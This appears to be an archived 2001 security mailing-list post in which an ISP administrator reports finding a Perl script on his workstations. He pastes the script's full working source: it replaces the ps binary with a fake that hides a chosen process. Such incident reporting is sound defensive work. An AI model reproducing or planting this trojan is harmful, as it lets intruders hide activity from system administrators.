hi..i'm an admin of a small isp i found this program on all my workstation it was called hideit.pl it seems to hide any program from ps! #This little perl script will replace the ps program with a fake ps #that #doesn't show the program u want to hide, the original ps replaced #will be saved #in /bin/ps.bak and can be restored by running:ps2.pl Restore #stupid but usefull!;) #by SLACKo from Dalnet #!/usr/bin/perl if ($#ARGV<0) {die "Usage : $0 Program (To hide a program from ps) or $0 Restore (To restore ps)\n"}; $eshta = `whereis ps` =~ /^\S+:\s+(\S+)/;$new=$1; restore() if ($ARGV[0] eq "Restore"); system("cp $new /bin/ps.bak") if (! -f '/bin/ps.bak'); open(HH,">$new") or die "$!\n"; $string = <<"EOF"; #!/usr/bin/perl open(PS,"/bin/ps.bak \$ARGV[0]|") or die "$!\n"; while (<PS>) { s/perl(.*)bin(.*)/ps \$ARGV[0]/g; next if (/($ARGV[0]|ps.bak)/); print;} EOF print HH "$string";close(HH,PS); sub restore {system("cp /bin/ps.bak $new");exit;} _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Aug 12 2001 - 16:48:53 PDT